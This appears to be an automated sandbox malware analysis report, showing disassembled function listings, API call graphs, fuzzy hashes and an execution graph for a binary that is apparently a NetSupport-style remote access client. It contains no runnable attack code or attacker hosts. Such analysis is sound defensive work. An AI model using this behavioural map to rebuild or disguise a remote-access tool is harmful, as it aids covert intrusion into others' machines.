                                                                                      • CryptUnprotectMemory failed, xrefs: 0040DFAD
                                                                                      • CryptProtectMemory failed, xrefs: 0040DF75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                      • API String ID: 2190909847-396321323
                                                                                      • Opcode ID: 75447ea78798f300276a7d8dbedc4bdf709c91a09c2fc9fa621eb3f6d439b897
                                                                                      • Instruction ID: bd8cbad2415a8e52a6ae8fb3d5db5bafffe0558d4e46824eebb325400524a47f
                                                                                      • Opcode Fuzzy Hash: 75447ea78798f300276a7d8dbedc4bdf709c91a09c2fc9fa621eb3f6d439b897
                                                                                      • Instruction Fuzzy Hash: F6115E71B081175BDB1197A9DC01A6B7399AF85714B14C03BF803FA2D1DB78DC4446DC
                                                                                      Function 004012E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040CED7: GetWindowRect.USER32(?,?), ref: 0040CF0E
                                                                                        • Part of subcall function 0040CED7: GetClientRect.USER32(?,?), ref: 0040CF1A
                                                                                        • Part of subcall function 0040CED7: GetWindowLongW.USER32(?,000000F0), ref: 0040CFBB
                                                                                        • Part of subcall function 0040CED7: GetWindowRect.USER32(?,?), ref: 0040CFE8
                                                                                        • Part of subcall function 0040CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0040D007
                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                      • SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Text$ClientItemLong
                                                                                      • String ID: 0
                                                                                      • API String ID: 660763476-4108050209
                                                                                      • Opcode ID: 03602c7cc300b2fb414b74c470aaaa0ff67f8af0a5f6a16136b5b980f5256f13
                                                                                      • Instruction ID: 634b9c1a618eabc1432a9cca45ba6a5c4f9a078cbf5d22d980ad555275b14f8b
                                                                                      • Opcode Fuzzy Hash: 03602c7cc300b2fb414b74c470aaaa0ff67f8af0a5f6a16136b5b980f5256f13
                                                                                      • Instruction Fuzzy Hash: AFF0A4B0540248ABEF152F50CC0AAEB7B5A9B04748F489136FE45746F1C77CD850DB5C
                                                                                      Function 0040FAC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,0040FD0B,?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FACD
                                                                                      • GetLastError.KERNEL32(?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FAD9
                                                                                        • Part of subcall function 00406DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00406DF1
                                                                                      Strings
                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0040FAE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                      • API String ID: 1091760877-2248577382
                                                                                      • Opcode ID: ca3bc7d3eb601de886ace3ab94fb90e8f086a0082c109aa78ec3a03241ef52a3
                                                                                      • Instruction ID: cd3685a53f5d58efe78c1ff89521e9a9f7fe5c9133110a0b543a6ec56afcdb30
                                                                                      • Opcode Fuzzy Hash: ca3bc7d3eb601de886ace3ab94fb90e8f086a0082c109aa78ec3a03241ef52a3
                                                                                      • Instruction Fuzzy Hash: C4D05E7260843167D61133287C1AE6F79149F12734F25573BF13AB92E5CB780C61869E

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:15%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:101
                                                                                      execution_graph 58815 11108d30 58858 1110f420 58815->58858 58818 11108da9 OpenEventA 58821 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 58818->58821 58822 11108e18 CloseHandle GetSystemDirectoryA 58818->58822 58824 1110f420 std::locale::_Init 274 API calls 58821->58824 58823 11108e38 58822->58823 58823->58823 58826 11108e40 LoadLibraryA 58823->58826 58825 11108f23 58824->58825 58827 11108f3c 58825->58827 58929 110f4680 277 API calls std::locale::_Init 58825->58929 58826->58821 58828 11108e71 58826->58828 58886 1110f2b0 58827->58886 58902 111450a0 58828->58902 58832 11108e7b 58834 11108e82 GetProcAddress 58832->58834 58835 11108e9a GetProcAddress 58832->58835 58834->58835 58837 11108ec4 FreeLibrary 58835->58837 58838 11108eb6 58835->58838 58837->58821 58838->58821 58840 11109005 58932 11161d01 58840->58932 58842 1110f420 std::locale::_Init 274 API calls 58844 11108f73 58842->58844 58843 1110901f 58845 11108f84 58844->58845 58846 11108f8d 58844->58846 58930 110f4680 277 API calls std::locale::_Init 58845->58930 58848 1110f2b0 414 API calls 58846->58848 58849 11108fa9 CloseHandle 58848->58849 58850 111450a0 std::locale::_Init 93 API calls 58849->58850 58851 11108fba 58850->58851 58851->58840 58852 1110f420 std::locale::_Init 274 API calls 58851->58852 58853 11108fc8 58852->58853 58854 11108fe2 58853->58854 58931 110f4680 277 API calls std::locale::_Init 58853->58931 58856 1110f2b0 414 API calls 58854->58856 58857 11108ffe CloseHandle 58856->58857 58857->58840 58940 11162b51 58858->58940 58861 1110f473 _memset 58865 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58861->58865 58862 1110f447 wsprintfA 58957 11029450 274 API calls 2 library calls 58862->58957 58866 11108d91 58865->58866 58866->58818 58867 11107290 58866->58867 58966 1110f520 58867->58966 58870 1110f520 3 API calls 58871 111072dc 58870->58871 58872 1110f520 3 API calls 58871->58872 58873 111072ee 58872->58873 58874 1110f520 3 API calls 58873->58874 58875 111072ff 58874->58875 58876 1110f520 3 API calls 58875->58876 58877 11107310 58876->58877 58878 1110f420 std::locale::_Init 274 API calls 58877->58878 58879 11107321 58878->58879 58880 1110740a 58879->58880 58881 1110732c LoadLibraryA LoadLibraryA 58879->58881 58973 1116219a 66 API calls std::exception::_Copy_str 58880->58973 58881->58818 58883 11107419 58974 111625f1 RaiseException 58883->58974 58885 1110742e 58887 1110f2d0 CreateThread 58886->58887 58888 1110f2bf CreateEventA 58886->58888 58890 1110f2f6 58887->58890 58891 1110f30d 58887->58891 58978 11102c50 58887->58978 59000 1110fde0 58887->59000 59014 11027270 58887->59014 59039 1102c410 58887->59039 58888->58887 58977 11029450 274 API calls 2 library calls 58890->58977 58893 1110f311 WaitForSingleObject CloseHandle 58891->58893 58894 11108f58 CloseHandle 58891->58894 58893->58894 58896 1109e9e0 58894->58896 58897 1109e9ef GetCurrentProcess OpenProcessToken 58896->58897 58898 1109ea2d 58896->58898 58897->58898 58899 1109ea12 58897->58899 58898->58840 58898->58842 59419 1109e910 58899->59419 58901 1109ea1b CloseHandle 58901->58898 58903 111450c1 GetVersionExA 58902->58903 58912 1114529c 58902->58912 58904 111450e3 58903->58904 58903->58912 58906 111450f0 RegOpenKeyExA 58904->58906 58904->58912 58905 111452a5 58907 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58905->58907 58908 1114511d _memset 58906->58908 58906->58912 58909 111452b2 58907->58909 59432 11143000 RegQueryValueExA 58908->59432 58909->58832 58910 11145304 58911 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58910->58911 58913 11145314 58911->58913 58912->58905 58912->58910 59439 11081c60 58912->59439 58913->58832 58917 11143000 std::locale::_Init RegQueryValueExA 58919 11145189 58917->58919 58918 111452ec 58918->58905 58918->58910 58920 1114528f RegCloseKey 58919->58920 59434 11163a2d 58919->59434 58920->58912 58922 111451ad 58923 11163a2d std::locale::_Init 78 API calls 58922->58923 58925 111451c6 _strncpy 58922->58925 58923->58922 58924 11145271 58924->58920 58925->58924 58926 11143000 std::locale::_Init RegQueryValueExA 58925->58926 58927 11145248 58926->58927 58928 11143000 std::locale::_Init RegQueryValueExA 58927->58928 58928->58924 58929->58827 58930->58846 58931->58854 58933 11161d0b IsDebuggerPresent 58932->58933 58934 11161d09 58932->58934 59452 11177637 58933->59452 58934->58843 58937 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 58938 1116bcb6 __call_reportfault 58937->58938 58939 1116bcbe GetCurrentProcess TerminateProcess 58937->58939 58938->58939 58939->58843 58941 11162bce 58940->58941 58944 11162b5f 58940->58944 58964 1116d4a8 DecodePointer 58941->58964 58943 11162bd4 58965 111692ef 66 API calls __getptd_noexit 58943->58965 58947 11162b8d RtlAllocateHeap 58944->58947 58949 11162b6a 58944->58949 58951 11162bba 58944->58951 58955 11162bb8 58944->58955 58961 1116d4a8 DecodePointer 58944->58961 58947->58944 58948 1110f43e 58947->58948 58948->58861 58948->58862 58949->58944 58958 1116d99d 66 API calls 2 library calls 58949->58958 58959 1116d7ee 66 API calls 7 library calls 58949->58959 58960 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 58949->58960 58962 111692ef 66 API calls __getptd_noexit 58951->58962 58963 111692ef 66 API calls __getptd_noexit 58955->58963 58958->58949 58959->58949 58961->58944 58962->58955 58963->58948 58964->58943 58965->58948 58967 1110f536 CreateEventA 58966->58967 58968 1110f549 58966->58968 58967->58968 58969 1110f557 58968->58969 58975 1110f260 InterlockedIncrement 58968->58975 58971 111072cc 58969->58971 58976 1110f3c0 InterlockedIncrement 58969->58976 58971->58870 58973->58883 58974->58885 58975->58969 58976->58971 59074 11089280 58978->59074 58980 11102c5d 58981 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 58980->58981 58982 11102ccf GetLastError 58981->58982 58983 11102c8f SetThreadDesktop 58981->58983 58984 11146450 std::locale::_Init 21 API calls 58982->58984 58985 11102cb1 GetLastError 58983->58985 58986 11102c9a 58983->58986 58987 11102ce1 58984->58987 58989 11146450 std::locale::_Init 21 API calls 58985->58989 59085 11146450 58986->59085 59079 11102bd0 58987->59079 58990 11102cc3 CloseDesktop 58989->58990 58990->58987 58993 11102ceb 59091 1110f340 58993->59091 58995 11102cf2 59096 110f4740 16 API calls 58995->59096 58997 11102cf9 59097 1110f370 SetEvent PulseEvent 58997->59097 58999 11102d00 std::ios_base::_Tidy 59150 110b7a20 59000->59150 59002 1110fdee GetCurrentThreadId 59003 1110f340 275 API calls 59002->59003 59012 1110fe09 std::ios_base::_Tidy 59003->59012 59005 1110fe20 WaitForSingleObject 59152 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 59005->59152 59006 1110fe8a 59008 1110fe43 59010 1110fe53 PostMessageA 59008->59010 59011 1110fe58 PostThreadMessageA 59008->59011 59009 1110fe80 59154 1110f370 SetEvent PulseEvent 59009->59154 59010->59012 59011->59012 59012->59005 59012->59008 59012->59009 59153 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 59012->59153 59015 110272a2 59014->59015 59016 11089280 5 API calls 59015->59016 59017 110272a9 CreateEventA 59016->59017 59018 1110f420 std::locale::_Init 274 API calls 59017->59018 59019 110272c6 59018->59019 59020 110272e7 59019->59020 59155 111100d0 59019->59155 59022 1110f340 275 API calls 59020->59022 59032 110272ff 59022->59032 59023 11027316 WaitForMultipleObjects 59024 1102732d 59023->59024 59023->59032 59025 11027336 PostMessageA 59024->59025 59026 1102734a SetEvent Sleep 59024->59026 59025->59026 59025->59032 59026->59032 59027 110273f4 59028 1102740e CloseHandle 59027->59028 59184 1110fc70 287 API calls 2 library calls 59027->59184 59185 1110f370 SetEvent PulseEvent 59028->59185 59029 11027375 PostMessageA 59029->59032 59032->59023 59032->59027 59032->59029 59036 110273ba GetCurrentThreadId GetThreadDesktop 59032->59036 59183 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 59032->59183 59033 11027423 59035 11027405 std::ios_base::_Tidy 59035->59028 59036->59032 59037 110273c9 SetThreadDesktop 59036->59037 59037->59032 59038 110273d4 CloseDesktop 59037->59038 59038->59032 59040 1102c442 59039->59040 59041 1110f340 275 API calls 59040->59041 59042 1102c44f WaitForSingleObject 59041->59042 59043 1102c466 59042->59043 59044 1102c67d 59042->59044 59046 1102c470 GetTickCount 59043->59046 59047 1102c666 WaitForSingleObject 59043->59047 59283 1110f370 SetEvent PulseEvent 59044->59283 59189 110d1550 59046->59189 59047->59043 59047->59044 59048 1102c684 CloseHandle 59284 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 59048->59284 59051 1102c695 std::ios_base::_Tidy 59053 110d1550 274 API calls 59063 1102c486 59053->59063 59054 1102c6b4 59285 11029450 274 API calls 2 library calls 59054->59285 59056 1102c6c8 59286 11029450 274 API calls 2 library calls 59056->59286 59058 1102c6dc 59287 11029450 274 API calls 2 library calls 59058->59287 59061 1102c6f0 59288 11029450 274 API calls 2 library calls 59061->59288 59062 1102c574 GetTickCount 59073 1102c571 std::ios_base::_Tidy 59062->59073 59063->59053 59063->59054 59063->59056 59063->59058 59063->59062 59199 110d0710 59063->59199 59211 11029590 LoadLibraryA 59063->59211 59263 110d1370 275 API calls 2 library calls 59063->59263 59067 11146450 std::locale::_Init 21 API calls 59067->59073 59068 110d07c0 274 API calls 59068->59073 59071 110679c0 290 API calls 59071->59073 59073->59054 59073->59056 59073->59061 59073->59062 59073->59067 59073->59068 59073->59071 59264 11142290 59073->59264 59273 11042530 276 API calls 2 library calls 59073->59273 59274 110d07c0 59073->59274 59098 1110f6c0 59074->59098 59076 11089290 59077 110892b3 59076->59077 59078 110892a2 UnhookWindowsHookEx 59076->59078 59077->58980 59078->59077 59080 1110f420 std::locale::_Init 274 API calls 59079->59080 59081 11102bfd 59080->59081 59082 11102c30 59081->59082 59104 11102ab0 59081->59104 59082->58993 59084 11102c1d 59084->58993 59086 11146461 59085->59086 59087 1114645c 59085->59087 59124 111458f0 59086->59124 59127 111456a0 18 API calls std::locale::_Init 59087->59127 59092 1110f360 SetEvent 59091->59092 59093 1110f349 59091->59093 59092->58995 59149 11029450 274 API calls 2 library calls 59093->59149 59096->58997 59097->58999 59099 1110f6d7 EnterCriticalSection 59098->59099 59100 1110f6ce GetCurrentThreadId 59098->59100 59101 1110f6ee ___DllMainCRTStartup 59099->59101 59100->59099 59102 1110f6f5 LeaveCriticalSection 59101->59102 59103 1110f708 LeaveCriticalSection 59101->59103 59102->59076 59103->59076 59111 1115f550 59104->59111 59107 11102b81 CreateWindowExA 59107->59084 59108 11102b17 std::locale::_Init 59109 11102b50 GetStockObject RegisterClassA 59108->59109 59109->59107 59110 11102b7a 59109->59110 59110->59107 59114 1115e380 GlobalAddAtomA 59111->59114 59115 1115e3b5 GetLastError wsprintfA 59114->59115 59116 1115e407 GlobalAddAtomA GlobalAddAtomA 59114->59116 59123 11029450 274 API calls 2 library calls 59115->59123 59117 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59116->59117 59120 11102ae1 GlobalAddAtomA 59117->59120 59120->59107 59120->59108 59128 111457a0 59124->59128 59126 11102ca5 CloseDesktop 59126->58987 59127->59086 59129 111457c4 59128->59129 59130 111457c9 59128->59130 59148 111456a0 18 API calls std::locale::_Init 59129->59148 59132 11145832 59130->59132 59133 111457d2 59130->59133 59134 111458de 59132->59134 59135 1114583f wsprintfA 59132->59135 59136 11145809 59133->59136 59139 111457e0 59133->59139 59137 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59134->59137 59138 11145862 59135->59138 59142 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59136->59142 59140 111458ea 59137->59140 59138->59138 59141 11145869 wvsprintfA 59138->59141 59144 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59139->59144 59140->59126 59147 11145884 59141->59147 59143 1114582e 59142->59143 59143->59126 59145 11145805 59144->59145 59145->59126 59146 111458d1 OutputDebugStringA 59146->59134 59147->59146 59147->59147 59148->59130 59151 110b7a28 std::locale::_Init 59150->59151 59151->59002 59152->59012 59153->59012 59154->59006 59156 1110f420 std::locale::_Init 274 API calls 59155->59156 59157 11110101 59156->59157 59159 1110f420 std::locale::_Init 274 API calls 59157->59159 59165 11110123 GetCurrentThreadId InitializeCriticalSection 59157->59165 59162 1111011c 59159->59162 59160 11110190 EnterCriticalSection 59163 1111024a LeaveCriticalSection 59160->59163 59164 111101be CreateEventA 59160->59164 59161 11110183 InitializeCriticalSection 59161->59160 59162->59165 59186 1116219a 66 API calls std::exception::_Copy_str 59162->59186 59163->59020 59166 111101d1 59164->59166 59167 111101e8 59164->59167 59165->59160 59165->59161 59188 11029450 274 API calls 2 library calls 59166->59188 59171 1110f420 std::locale::_Init 274 API calls 59167->59171 59169 1111013f 59187 111625f1 RaiseException 59169->59187 59174 111101ef 59171->59174 59175 1111020c 59174->59175 59176 111100d0 408 API calls 59174->59176 59177 1110f420 std::locale::_Init 274 API calls 59175->59177 59176->59175 59178 1111021c 59177->59178 59179 1111022d 59178->59179 59180 1110f520 3 API calls 59178->59180 59181 1110f2b0 408 API calls 59179->59181 59180->59179 59182 11110245 59181->59182 59182->59163 59183->59032 59184->59035 59185->59033 59186->59169 59187->59165 59289 110d1480 59189->59289 59192 110d159b 59195 110d15b5 59192->59195 59196 110d1598 59192->59196 59193 110d1584 59303 11029450 274 API calls 2 library calls 59193->59303 59195->59063 59196->59192 59304 11029450 274 API calls 2 library calls 59196->59304 59200 110d0724 59199->59200 59344 11163cf8 59200->59344 59207 110d077c 59207->59063 59208 110d0765 59369 11029450 274 API calls 2 library calls 59208->59369 59256 11029621 std::ios_base::_Tidy 59211->59256 59212 11029653 GetProcAddress 59216 11029671 SetLastError 59212->59216 59212->59256 59213 11162b51 66 API calls _malloc 59213->59256 59214 11029748 InternetOpenA 59214->59256 59215 1102972f GetProcAddress 59215->59214 59217 11029779 SetLastError 59215->59217 59216->59256 59217->59256 59218 110296a5 GetProcAddress 59219 11029762 SetLastError 59218->59219 59218->59256 59220 110296d2 GetLastError 59219->59220 59220->59256 59221 11142290 std::locale::_Init 274 API calls 59221->59256 59222 110296f5 GetProcAddress 59224 1102976f SetLastError 59222->59224 59222->59256 59223 11162be5 66 API calls _free 59223->59256 59224->59256 59225 11029a40 59229 11029b76 GetProcAddress 59225->59229 59230 11029a31 59225->59230 59226 11029bb0 59226->59073 59227 11029ba9 FreeLibrary 59227->59226 59228 11029a57 GetProcAddress 59231 11029b2e SetLastError 59228->59231 59252 11029a1a std::ios_base::_Tidy 59228->59252 59229->59230 59232 11029b97 SetLastError 59229->59232 59230->59226 59230->59227 59253 11029b36 std::ios_base::_Tidy 59231->59253 59232->59230 59233 11081a70 IsDBCSLeadByte 59233->59256 59236 11029b5b 59404 110278a0 GetProcAddress SetLastError 59236->59404 59237 1102982b GetProcAddress 59238 1102983e InternetConnectA 59237->59238 59242 11029881 SetLastError 59237->59242 59238->59256 59240 110297ff GetProcAddress 59244 1102981c SetLastError 59240->59244 59240->59256 59242->59256 59243 11029b6a 59243->59225 59244->59256 59245 11029864 GetProcAddress 59247 11029891 SetLastError 59245->59247 59245->59256 59246 110298a3 GetProcAddress 59248 110298d6 SetLastError 59246->59248 59246->59256 59247->59256 59248->59256 59249 110d1090 274 API calls 59250 11029a80 std::ios_base::_Tidy 59249->59250 59250->59249 59250->59252 59250->59253 59395 1110f4a0 59250->59395 59402 11027850 GetProcAddress SetLastError 59250->59402 59251 110298f1 GetProcAddress 59254 11029918 SetLastError 59251->59254 59251->59256 59252->59225 59252->59228 59252->59230 59252->59250 59403 110278a0 GetProcAddress SetLastError 59253->59403 59255 11029922 GetLastError 59254->59255 59255->59256 59257 1102993d GetProcAddress 59255->59257 59256->59212 59256->59213 59256->59214 59256->59215 59256->59218 59256->59220 59256->59221 59256->59222 59256->59223 59256->59233 59256->59237 59256->59238 59256->59240 59256->59245 59256->59246 59256->59251 59256->59252 59256->59255 59259 11029975 GetLastError 59256->59259 59260 1102998c GetDesktopWindow 59256->59260 59257->59256 59258 1102996d SetLastError 59257->59258 59258->59259 59259->59256 59259->59260 59260->59256 59261 1102999a GetProcAddress 59260->59261 59261->59256 59262 110299d6 SetLastError 59261->59262 59262->59256 59263->59063 59265 1114229a 59264->59265 59266 1114229c 59264->59266 59265->59073 59267 1110f4a0 std::locale::_Init 274 API calls 59266->59267 59268 111422c2 59267->59268 59269 111422cb _strncpy 59268->59269 59270 111422e9 59268->59270 59269->59073 59406 11029450 274 API calls 2 library calls 59270->59406 59273->59073 59407 110d05c0 59274->59407 59277 110d07e9 59412 11162be5 59277->59412 59278 110d07d2 59411 11029450 274 API calls 2 library calls 59278->59411 59281 110d07f2 59281->59047 59283->59048 59284->59051 59290 110d148c 59289->59290 59291 110d14a7 59290->59291 59292 110d1490 59290->59292 59305 110d0190 59291->59305 59334 11029450 274 API calls 2 library calls 59292->59334 59299 110d14de 59299->59192 59299->59193 59300 110d14c7 59335 11029450 274 API calls 2 library calls 59300->59335 59306 110d0199 59305->59306 59307 110d019d 59306->59307 59308 110d01b4 59306->59308 59336 11029450 274 API calls 2 library calls 59307->59336 59310 110d01b1 59308->59310 59311 110d01e8 59308->59311 59310->59308 59337 11029450 274 API calls 2 library calls 59310->59337 59313 110d01e5 59311->59313 59314 110d0206 59311->59314 59313->59311 59338 11029450 274 API calls 2 library calls 59313->59338 59317 110d1090 59314->59317 59318 110d109e 59317->59318 59319 110d10b9 59318->59319 59320 110d10a2 59318->59320 59322 110d10b6 59319->59322 59324 110d10ec 59319->59324 59339 11029450 274 API calls 2 library calls 59320->59339 59322->59319 59340 11029450 274 API calls 2 library calls 59322->59340 59323 110d1160 59323->59299 59323->59300 59324->59323 59324->59324 59341 110d09e0 274 API calls std::locale::_Init 59324->59341 59327 110d1113 59330 110d111f _memmove 59327->59330 59342 110d0920 274 API calls std::locale::_Init 59327->59342 59330->59323 59331 110d1149 59330->59331 59343 11029450 274 API calls 2 library calls 59331->59343 59341->59327 59342->59330 59345 11163d09 _strlen 59344->59345 59348 110d072f 59344->59348 59346 11162b51 _malloc 66 API calls 59345->59346 59347 11163d1c 59346->59347 59347->59348 59370 1116be9f 59347->59370 59352 110d0450 59348->59352 59353 110d045b 59352->59353 59354 110d0472 59352->59354 59391 11029450 274 API calls 2 library calls 59353->59391 59357 110cfe70 59354->59357 59358 110cfe7d 59357->59358 59359 110cfe98 59358->59359 59360 110cfe81 59358->59360 59362 110cfe95 59359->59362 59363 110cfeb6 59359->59363 59392 11029450 274 API calls 2 library calls 59360->59392 59362->59359 59393 11029450 274 API calls 2 library calls 59362->59393 59365 110cfeb3 59363->59365 59366 110cfed9 59363->59366 59365->59363 59394 11029450 274 API calls 2 library calls 59365->59394 59366->59207 59366->59208 59371 1116beb4 59370->59371 59372 1116bead 59370->59372 59382 111692ef 66 API calls __getptd_noexit 59371->59382 59372->59371 59376 1116bed2 59372->59376 59374 1116beb9 59383 1116df04 11 API calls _fputs 59374->59383 59377 11163d2e 59376->59377 59384 111692ef 66 API calls __getptd_noexit 59376->59384 59377->59348 59379 1116deb2 59377->59379 59385 1116dd89 59379->59385 59382->59374 59383->59377 59384->59374 59386 1116dda8 _memset __call_reportfault 59385->59386 59387 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 59386->59387 59388 1116de94 __call_reportfault 59387->59388 59389 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59388->59389 59390 1116deb0 GetCurrentProcess TerminateProcess 59389->59390 59390->59348 59396 11162b51 _malloc 66 API calls 59395->59396 59397 1110f4ae 59396->59397 59398 1110f4b7 59397->59398 59400 1110f4ce _memset 59397->59400 59405 11029450 274 API calls 2 library calls 59398->59405 59400->59250 59402->59250 59403->59236 59404->59243 59408 110d05d9 59407->59408 59409 110d05ec 59407->59409 59408->59409 59410 110d0450 274 API calls 59408->59410 59409->59277 59409->59278 59410->59409 59413 11162bf0 HeapFree 59412->59413 59414 11162c19 _free 59412->59414 59413->59414 59415 11162c05 59413->59415 59414->59281 59418 111692ef 66 API calls __getptd_noexit 59415->59418 59417 11162c0b GetLastError 59417->59414 59418->59417 59420 1109e930 GetTokenInformation 59419->59420 59425 1109e9c6 59419->59425 59422 1109e952 __crtGetStringTypeA_stat 59420->59422 59421 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59423 1109e9d8 59421->59423 59424 1109e958 GetTokenInformation 59422->59424 59422->59425 59423->58901 59424->59425 59426 1109e96a 59424->59426 59425->59421 59427 1109e99f EqualSid 59426->59427 59428 1109e973 AllocateAndInitializeSid 59426->59428 59427->59425 59429 1109e9ad 59427->59429 59428->59425 59428->59427 59430 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59429->59430 59431 1109e9c2 59430->59431 59431->58901 59433 1114302a 59432->59433 59433->58917 59435 11163a4d 59434->59435 59436 11163a3b 59434->59436 59449 111639dc 78 API calls _LocaleUpdate::_LocaleUpdate 59435->59449 59436->58922 59438 11163a57 59438->58922 59440 11081c6d 59439->59440 59441 11081c72 59439->59441 59450 11081990 IsDBCSLeadByte 59440->59450 59443 11081c7b 59441->59443 59447 11081c93 59441->59447 59451 11163784 80 API calls 3 library calls 59443->59451 59445 11081c8c 59445->58918 59446 11165797 84 API calls std::locale::_Init 59446->59447 59447->59446 59448 11081c99 59447->59448 59448->58918 59449->59438 59450->59441 59451->59445 59452->58937 59453 11115b70 59471 11145320 59453->59471 59455 11115bb5 59456 11115bc4 CoInitialize CoCreateInstance 59455->59456 59457 11115b98 59455->59457 59459 11115bf4 LoadLibraryA 59456->59459 59470 11115be9 59456->59470 59460 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59457->59460 59462 11115c10 GetProcAddress 59459->59462 59459->59470 59463 11115ba6 59460->59463 59461 111450a0 std::locale::_Init 93 API calls 59461->59455 59464 11115c20 SHGetSettings 59462->59464 59465 11115c34 FreeLibrary 59462->59465 59464->59465 59465->59470 59466 11115cd1 CoUninitialize 59467 11115cd7 59466->59467 59468 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59467->59468 59469 11115ce6 59468->59469 59470->59466 59470->59467 59472 111450a0 std::locale::_Init 93 API calls 59471->59472 59473 11115b8e 59472->59473 59473->59455 59473->59457 59473->59461 59474 821020 GetCommandLineA 59475 821035 GetStartupInfoA 59474->59475 59477 821090 GetModuleHandleA 59475->59477 59478 82108b 59475->59478 59481 821000 _NSMClient32 59477->59481 59478->59477 59480 8210a2 ExitProcess 59481->59480 59482 11173a35 59505 1116b7b5 59482->59505 59484 11173a52 _LcidFromHexString 59485 11173a5f GetLocaleInfoA 59484->59485 59486 11173a86 59485->59486 59487 11173a92 59485->59487 59489 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59486->59489 59510 111646ce 